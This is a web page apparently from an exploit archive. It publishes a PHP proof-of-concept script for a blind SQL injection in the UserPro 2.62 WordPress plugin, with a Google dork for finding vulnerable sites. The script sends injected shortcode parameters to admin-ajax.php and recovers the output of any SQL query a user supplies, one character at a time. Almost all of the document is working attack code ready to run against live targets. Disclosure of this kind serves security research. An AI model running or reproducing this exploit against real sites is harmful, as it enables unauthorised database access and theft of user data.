
WordPress UserPro 2.62 User Profiles with Social Login Exploit

Posted on 30 November -0001

<?php /** * Exploit Title: UserPro - User Profiles with Social Login Exploit * Google Dork: inurl:"wp-content/uploads/userpro/" * Exploit Author: <contact@wp0day.com> * Vendor Homepage: http://userproplugin.com/ * Software Link: http://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 * Version: 2.62 * Tested on: Debian 8, PHP 5.5.9 * Type: SQLInjection * Time Line: Found [30-MAR-2016], Vendor notified [30-MAR-2016], Vendor fixed: [???], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:s:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ help(); } exploit(); function isTrue($query){ global $curl, $options; $rand = rand(); $data = "action=userpro_shortcode_template&shortcode=[userpro template='memberlist' sortby="use_ssl' AND ($query) -- LIMIT 10 AND 11='777" ]"; $curl->post( $options['t'].'/wp-admin/admin-ajax.php?searchuser=yes&from_wp_user_level=0&to_wp_user_level=99', $data ); $res=$curl->getResponse(); //echo $res; $res = json_decode($res, true); if (preg_match('~No users match your search~', $res['response'])){ return false; } if (preg_match('~userpro-search-results">Found <span>(d+)</span> Members~', $res['response'])){ return true; } return '???'; } function exploit(){ global $curl, $options; echo "Blind SQL Injection "; $sql = (isset($options['s'])) ? $options['s'] : 'SELCET user() '; if (isset($options['s'])){ $sql = $options['s']; } echo "SQL: $sql "; $sql = "($sql)"; //First Step get the length. //Fuck divide et impera, its a POC, lets do the easy way. $len = 0; echo "Getting query Lenght."; for ($i=0; $i<50;$i++){ $query = "( (SELECT LENGTH($sql)) = $i )"; $status = isTrue($query); echo "."; if (!is_bool($status)){ die(" Got unexpected response from isTrue(). Aborting. 
"); } if ($status){ echo " Current Query lenght is $i "; $len = $i; break; } } if ($len > 0){ echo " Response: "; $charset = 'etaoinsrhdluc@1234567890.$mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ'; for ($i = 1; $i<$len+1; $i++){ $got = false; for ($j=0;$j<strlen($charset);$j++){ $query = "(SELECT MID(($sql),$i,1)) = '{$charset[$j]}' "; if (isTrue($query)){ echo $charset[$j]; $got = true; break; } } if (!$got){ echo "?"; } } } else { die(" Could not get Lenght of Query or is bigger than 50 "); } echo " Done."; } function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } return $options; } function help(){ global $argv; $help = <<<EOD UserPro - User Profiles with Social Login Exploit Usage: php $argv[0] -t [TARGET URL] -s [SQL] [TARGET_URL] http://localhost/wordpress/ Examples: php $argv[0] -t http://localhost/wordpress -s 'SELECT user()' Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help." "; die(); } ?>

 
